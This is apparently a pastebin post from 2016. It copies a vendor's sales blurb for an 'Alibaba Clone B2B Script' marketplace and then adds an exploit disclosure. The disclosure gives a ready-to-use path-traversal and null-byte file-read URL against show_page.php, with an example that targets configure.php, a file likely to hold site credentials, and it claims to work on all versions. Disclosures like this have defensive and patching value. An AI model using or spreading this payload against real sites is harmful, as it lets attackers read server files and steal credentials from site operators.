Alibaba Clone B2B Script - Arbitrary File Disclosure


SUBMITTED BY: sahertian

DATE: June 24, 2016, 5:26 p.m.

FORMAT: Text only

SIZE: 2.3 kB

HITS: 760

  1. Alibaba Clone B2B Marketplace Script clone of Alibaba Marketplace script is a wonderful solution to launch your own business to business and b2c site. Script is packed with lot of features to provide a very sound foundation to your trading portal site. B2B trading Marketplace script is perfect to launch your own top quality trading portal. It is a Complete Script with quality features like:
  2. 1. Products, Sell Offers, Buy Offers, Company profiles, Trade Shows, Business Directory, Discussion forum
  3. 2. Complete internal messaging
  4. 3. Three membership levels : Gold, Silver and Bronze
  5. 4. Customizable site colors and graphics
  6. 5. Script parameters are highly configurable through script admin panel.
  7. 6. Credit Card , Paypal and Moneybookers module payment method.
  8. 7. Sub-Domain Support . Each user will have sub-domain for their company profile. i.e http://nokia.yourdomain.com
  9. 8. Multi-Language Supported. You will have your website in more then 21 languages.
  10. Arabic, Chinese, Croatian, Dutch, English, French, German, Indonesian, Italian, Japanese, Korean, Malaysian, Persian, Portuguese, Russian, Serbain, Spanish, Swedish, Thai, Turkish, Vietnamese.
  11. 9. Success Stories.
  12. 10. Trade Shows.
  13. 11. TrustPass and much more.
  14. Running website like Alibaba is not easy, but with the our software your website tasks just got a lot easier. We've designed our b2b software for the do-it yourself webmasters, incorporating the greatest features to make running your b2b marketplace and your life a lot easier while freeing you up to do the things that require manual labor.
  15. Our script is search engine friendly. It also increases your websites search engine rankings!
  16. One of the great features our b2b software has is it Multi-Language support. Now our script is available in more then 21 languages. You can read everything in your mother language!
  17. # Exploit Title: Alibaba Clone B2B Script File Read Vulnerability
  18. # Date: 2016-06-22
  19. # Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
  20. # Vendor Homepage: http://alibaba-clone.com/
  21. # Version: All Versions
  22. # Tested on: CentOS and Windows
  23. Exploit :
  24. http://site/show_page.php?page=../[FilePath]%00
  25. Example :
  26. http://site/show_page.php?page=../configure.php%00
  27. Thank you :)

comments powered by Disqus